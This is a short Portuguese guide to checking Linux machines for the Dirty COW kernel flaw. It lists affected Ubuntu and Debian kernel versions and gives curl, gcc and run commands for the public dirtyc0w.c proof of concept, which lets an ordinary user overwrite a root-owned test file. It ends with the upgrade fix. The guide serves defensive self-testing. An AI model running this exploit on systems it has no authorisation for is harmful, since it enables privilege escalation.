Todas as versões anteriores às seguintes versões são afetadas:
4.8.0-26.28 for Ubuntu 16.10
4.4.0-45.66 for Ubuntu 16.04 LTS
3.13.0-100.147 for Ubuntu 14.04 LTS
3.2.0-113.155 for Ubuntu 12.04 LTS
3.16.36-1+deb8u2 for Debian 8
3.2.82-1 for Debian 7
4.7.8-1 for Debian unstable
Se você precisar testar seu sistema, você pode baixar e compilar o PoC:
curl https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c > dirtyc0w.c
Como root crie o arquivo foo
:
sudo -s
echo This is a TEST > foo
Verifique:
ls -l foo
Como usuário é executado:
gcc -pthread dirtyc0w.c -o dirtyc0w
./dirtyc0w foo m00000000000000000
Verifique se o arquivo foo
está modificado:
Se você conseguir isso:
cat foo
:
m00000000000000000
Você é VULNERÁVEL.
Se o seu arquivo permanecer inalterado: This is a TEST
> > você está seguro.
Para corrigir seu sistema, execute:
sudo apt-get update && sudo apt-get dist-upgrade